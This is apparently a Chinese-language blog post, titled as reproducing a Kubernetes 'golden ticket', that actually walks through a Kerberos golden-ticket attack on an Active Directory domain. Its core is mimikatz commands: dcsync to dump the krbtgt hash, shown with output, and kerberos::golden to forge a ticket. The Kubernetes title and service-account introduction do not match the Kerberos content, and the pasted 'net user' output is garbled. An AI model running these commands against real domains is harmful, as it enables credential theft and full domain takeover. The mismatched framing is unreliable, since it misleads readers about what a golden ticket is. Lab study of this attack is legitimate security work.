复现k8s黄金票据学习

最新推荐文章于 2024-05-08 09:33:41 发布
最新推荐文章于 2024-05-08 09:33:41 发布
阅读量1.6k 收藏 11
点赞数 18
分类专栏: 内网渗透 文章标签: kubernetes 容器 云原生
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kaituozhizzz/article/details/137352461
版权

1.什么是黄金票据

在 Kubernetes 中,"黄金票据"并不是一个常见的术语。可能你想了解的是服务账户(Service Account)。服务账户是 Kubernetes 中用于身份验证和授权的一种机制。它们允许 Pods 或其他工作负载在 Kubernetes 集群中与 API 服务器进行交互,并且可以通过角色绑定(Role Binding)或集群角色绑定(ClusterRole Binding)来授予特定的权限。服务账户通常用于确定哪些 Pod 具有对集群资源的访问权限。

幽默理解就是:

想象一下,这些“票据”就像是给你的应用程序一把通往 Kubernetes 世界的“金钥匙”,让它们可以自如地与 Kubernetes 集群交流,像是在黄金矿里挖掘自己的资源一样。

在Kerberos协议中,主要有以下三个角色:

  • 访问服务的客户端:Kerberos客户端是代表需要访问资源的用户进行操作的应用程序,例如打开文件、查询数据库或打印文档。每个Kerberos客户端在访问资源之前都会请求身份验证。

  • 提供服务的服务端:域内提供服务的服务端,服务端都有一个独一的SPN。

  • ‍提供认证服务的KDC(Key Distribution Center,密钥分发中心):KDC密钥发行中心是一种网络服务,它向活动目录域内的用户和计算机提供会话票据和临时会话密钥,其服务帐户为krbtgt。KDC作为活动目录域服务ADDS的一部分运行在每个域控制器上。 这里说一下krbtgt帐户,该用户是在创建活动目录时系统自动创建的一个账号,其作用是KDC密钥发行中心的服务账号,其密码是系统随机生成的,无法正常登陆主机。

  • net user krbtgt

comment
Jser's comment
country/region code
Account active
Account expires
Password last set
Password expires
Password changeable
Password required
Jser may change password
Workstations allowed
ogon script
Jser profile
directoryHome
.astlogon
krbtgt
密钥发行中心服务帐户
000(system Default)NO
Never

    Kerberos协议有两个基础认证模块:AS_REQ & AS_REPTGS_REQ & TGS_REP ,以及微软扩展的两个认证模块 S4U 和 PAC 。S4U是微软为了实现委派而扩展的模块,分为 S4U2Self 和 S4U2Proxy 。

在 AS-REP 阶段,由于返回的 TGT 认购权证是由 krbtgt 用户的密码Hash加密的,因此如果我们拥有 krbtgt 的密码 hash 就可以自己制作一个TGT认购权证,这种攻击方式被称为黄金票据攻击。同样,在TGS-REP阶段,TGS_REP里面的ST服务票据是使用服务的hash进行加密的,如果我们拥有服务的hash,就可以签发任意用户的ST服务票据,这个票据也被称为白银票据,这种攻击方式被称为白银票据攻击。相较于黄金票据,白银票据使用要访问服务的hash,而不是krbtgt的hash。

在AS-REP阶段,Login session key是用用户密码 Hash 加密的。对于域用户,如果设置了“Do not require Kerberos preauthentication”不需要预认证选项,此时攻击者向域控制器的 88 端口发送 AS_REQ 请求,此时域控不会做任何验证就将 TGT认购权证 和 该用户Hash加密的Login Session Key返回。因此,攻击者就可以对获取到的 用户Hash加密的Login Session Key进行离线破解,如果破解成功,就能得到该用户的密码明文,这种攻击方式被称为 AS-REP Roasting攻击

使用黄金票据(Golden Ticket)攻击时,需要以下信息:

  1. 域名
  2. 域的SID 值
  3. 域的KRBTGT账户NTLM密码哈希
  4. 伪造用户名

mimikatz工具,命令:lsadump::dcsync /domian:域名 /user:krbtgt

systeminfo
net time /domain
ipconfig /all
 


whoami /user

获取域的krbtgt ntml hash

mimikatz # privilege::debug
Privilege '20' 

mimikatz # lsadump::dcsync /domain:g3et.cn /user:krbtgt /csv
[DC] 'g3et.cn' will be the domain
[DC] 'WIN-8BK8IDHGL5P.g3et.cn' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  e3b30d549fd63dd07a8d4c301e9ccf21        514
 

伪造票据

kerberos::golden /krbtgt:e3b30d549fd63dd07a8d4c301e9ccf21 /admin:Administrator /domain:g3et.cn /sid:S-1-5-21-1280000652-1105608915-707843028 /ticket:g3et.kirbi
 

总结1、用域管理运行mimikatz抓取完所需的东西 ==>再到域用户机器上运行伪造票据.。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash
3、黄金票据可以获取任何 Kerberos 服务权限,且由 krbtgt 的 hash 加密

kaituozhizzz
关注
  • 18
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
机器学习算法复现.zip
04-08
机器学习是一门多领域交叉学科,涉及概率论、统计学、逼近论、凸分析、算法复杂度理论等多门学科。它专门研究计算机怎样模拟或实现人类的学习行为,以获取新的知识或技能,重新组织已有的知识结构使之不断改善自身的...
学习笔记-OS - Exploits
人饭子的博客
11-01 490
OS - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 Linux 系统漏洞提权 原生软件提权 系统配置提权 sudo suid 远程漏洞 Windows 系统漏洞提权 远程漏洞 域 其他 FreeBSD OpenBSD Solaris Linux 相关资源 c...
2023级网络安全岗面试题及面试经验分享
黑战士的博客
02-25 6398
在当今社会网络安全行业越来越发达,也有越来越多的人去学习,为了更好地进行工作,除了学好知识外还要应对企业的面试。 所以在这里我归总了一些网络安全方面的常见面试题,希望对大家有所帮助。 一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享~ 写在前面 个人强烈感觉面试因人而异,对于简历上有具体项目经历的同学,个人感觉面试官会着重让你介绍自己的项目,包括但不限于介绍一次真实攻防/渗透/挖洞/CTF/代码审计的经历 => 因此对于自己的项目,面试前建议做一次复盘,最好能用文字描述出细节
【kerberos】org.apache.hadoop.security.AccessControlException: Client cannot authenticate via:[TOKEN,
Mrerlou的博客
02-16 1594
在用SUSE 操作系统安装 CM 大数据平台,在集群开启 kerberos 后,使用 HDFS 命令报错如下: 环境信息 SUSE Linux Enterprise Server 12 Service Pack 1 (SLES 12 SP5) 仔细看,在使用 klist 命令时,有个 他指向的路径是: 而在执行 命令时,有个 他指向的路径是 默认是去 目录下找 缓存。然后 SUSE 操作系统下 并不是放在 目录下,导致 客户端认为你没有进行 认证。所以报错。在中,我们增加了下面的参数以后
域渗透之非约束委派
qq_56426046的博客
11-12 710
一个域内普通用户jack通过Kerberos协议认证到前台WEB服务后,前台运行 WEB服务的服务账号websvc模拟(Impersonate)用户 jack,以Kerberos 协议继续认证到后台服务器,从而在后台服务器中获取jack用户的访问权限,即域中单跳或者多跳的Kerberos认证。KDC检查websvc的委派属性,如果被设置,且申请的文件服务在允许的列表清单中,则返回一个jack用户访问文件服务的授权票据 ST;websvc收到的jack用户的授权票据ST后,可访问文件服务,完成多跳认证。
RunC漏洞导致容器逃逸(CVE-2021-30465)
Ms08067安全实验室
01-06 1766
文章来源|MS08067 红队攻防班本文作者:BLACK(红队攻防班讲师)场景介绍runC是⼀个CLI⼯具,⽤于根据OCI规范⽣成和运⾏容器,该⼯具被⼴泛的应⽤于各种虚拟化环境中,如Kub...
渗透测试-干货 | 80篇+网络安全面试经验帖(面试篇)
lza20001103的博客
07-27 2555
渗透测试-干货 | 80篇+网络安全面试经验帖(面试篇)
面试总结-2023届安全面试题总汇
lza20001103的博客
09-16 6277
2023届安全面试题总汇 文章目录2023届安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安
2023级安全岗面试题及面试经验分享
yggcwhat
04-30 2917
写在前面 个人强烈感觉面试因人而异,对于简历上有具体项目经历的同学,个人感觉面试官会着重让你介绍自己的项目,包括但不限于介绍一次真实攻防/渗透/挖洞/CTF/代码审计的经历 => 因此对于自己的项目,面试前建议做一次复盘,最好能用文字描述出细节,在面试时才不会磕磕绊绊、或者忘了一些自己很得意的细节 面试题会一直更新(大概,直到我毕业或者躺平为止吧...)包括一些身边同学(若他们同意的话)和牛客上扒拉下来的(若有,会贴出链接)还有自己的一些经历 还有一点很想说的,就是面试题/面
Notes Twenty one days-渗透攻击-红队-权限提升
热门推荐
qq_34801745的博客
10-07 1万+
** Notes Twentieth Day-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-5 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
Github深度学习图像分类复现
03-09
深度学习图像分类,简单修改就可以跑,有问题随时私信,对应的博客说明: https://blog.csdn.net/qq_20373723/article/details/117109142?spm=1001.2014.3001.5501
学习 模型 MAML pytorch 代码 复现 可直接运行
06-02
学习 模型 MAML pytorch 代码 复现 可直接运行 元学习 模型 MAML pytorch 代码 复现 可直接运行
non-iid数据下的深度神经网络的分布式联邦学习  代码复现
09-13
Decentralized federated learning of deep neural networks on non-iid data non-iid数据下的深度神经网络的分布式联邦学习 代码复现  数据集:CIFAR-10 ,Fashion-MNIST  基线方案:① Random,随机八卦协议 ...
车联网+强化学习 实验复现
05-21
车联网+强化学习 实验复现图 《Spectrum Sharing in Vehicular Networks Based on Multi-Agent Reinforcement Learning》实验原图
K8S哲学 - 资源调度 DaemonSet
gu2022_3_5_21_23的博客
05-03 546
默认是滚动更新,结果是,一旦修改 yaml文件 template 里面的 内容,那么所有节点的 ds 都会更新,所以 修改为 OnDelete 模式、当 某一个 节点的 ds需要更新,就删除 改 ds ,会自动按照新的 yaml文件创建一个 ds。正常情况下,每个服务都会进行 各自的日志收集、但是因为他们不在 同一台 Node 上,导致一旦查日志就需要 调动各个 机器进行切换,不方便也不高效。所以只要 节点在 改集群内,只要 在需要的节点加上 nodeSelector 就会在该节点创建 ds。
K8S中的弹性云服务如何搭建,可能遇到的问题,如何解决!(稳啦!!!!全都稳啦!!!)
最新发布
Aprilqxs的博客
05-08 335
同时,弹性云服务还降低了企业的IT成本,因为用户只需根据实际使用的计算资源支付费用,无需承担额外的硬件成本和维护费用。弹性云服务(ECS)是一种基于云计算技术的虚拟服务器,由vCPU、内存、磁盘等组成的获取方便、弹性可扩展、按需使用的虚拟计算服务器。当CPU使用率下降时,会自动减少Pod的副本数,但不会少于1个。的Service对象,使用ClusterIP类型,将外部访问的80端口映射到Pod的8080端口。使用kubectl命令创建一个Deployment对象,定义要部署的应用程序的配置。
K8S面试题学习2
wyx的博客
05-06 695
参考做的个人总结,规划是每天看10题,thx!
11.1.k8s中pod的调度-nodeSelector节点选择器
qq_22321199的专栏
05-06 418
NodeSelector是Kubernetes调度器的一部分,它允许开发者根据节点的标签,精确地控制Pod在集群中的调度位置。通过在Pod的定义中设置NodeSelector,可以确保Pod只会被调度到具有特定标签的节点上。我们先创建一个普通的deploy资源,设置为10个副本,查看创建的pod;我们发现,其是随机创建在,k8s1和k8s2节点上的;那么我们有没有方法,让pod根据我们自己的想法,创建在我们想要的节点上呐?接下来,我们就学习,关于pod调度的节点选择器,nodeSelector。
深度学习开源代码复现
10-07
深度学习开源代码复现是指将已有的深度学习模型或算法的实现代码重新编写或复现出来。这样做的目的是为了验证原始论文中的算法,并且使其能够在不同的平台和框架上运行。通常,深度学习开源代码复现的过程需要参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kaituozhizzz

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值